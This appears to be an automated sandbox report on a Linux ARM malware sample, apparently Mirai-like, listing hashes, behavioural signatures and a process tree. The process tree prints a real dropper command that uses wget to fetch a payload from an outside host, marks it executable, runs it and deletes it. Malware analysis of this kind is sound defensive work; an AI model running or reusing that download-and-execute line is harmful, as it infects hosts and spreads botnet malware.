Analysis

  • max time kernel
    148s
  • max time network
    141s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240226-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    02/04/2024, 01:15

General

  • Target

    8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf

  • Size

    122KB

  • MD5

    74ca17a962720262e4449302a1b295d7

  • SHA1

    90e9582e7bd4b5766899957a8cb5975124ebac7a

  • SHA256

    8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95

  • SHA512

    cd2bb89b171c83f4f2491c05411b85b1c854b941922e119880a8400fcacd1178a2035786049f1db51327d0c5e266c5c5773ac91e7f4749c0db0edb1a0f50ca24

  • SSDEEP

    3072:FDcYVLWKlAQTv+mYUbpl2m7/L7QsvmGugiNb:WYVxlAk9YUbH2m7/L7QsvmGugiNb

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
    /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:658
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
        PID:659
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          3⤵
          • Writes file to tmp directory
          PID:663
        • /bin/chmod
          chmod 777 .....
          3⤵
            PID:674
          • /tmp/.....
            ./.....
            3⤵
            • Executes dropped EXE
            PID:676
          • /bin/sh
            /bin/sh ./.....
            3⤵
              PID:676
            • /bin/rm
              rm -rf .....
              3⤵
                PID:680

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads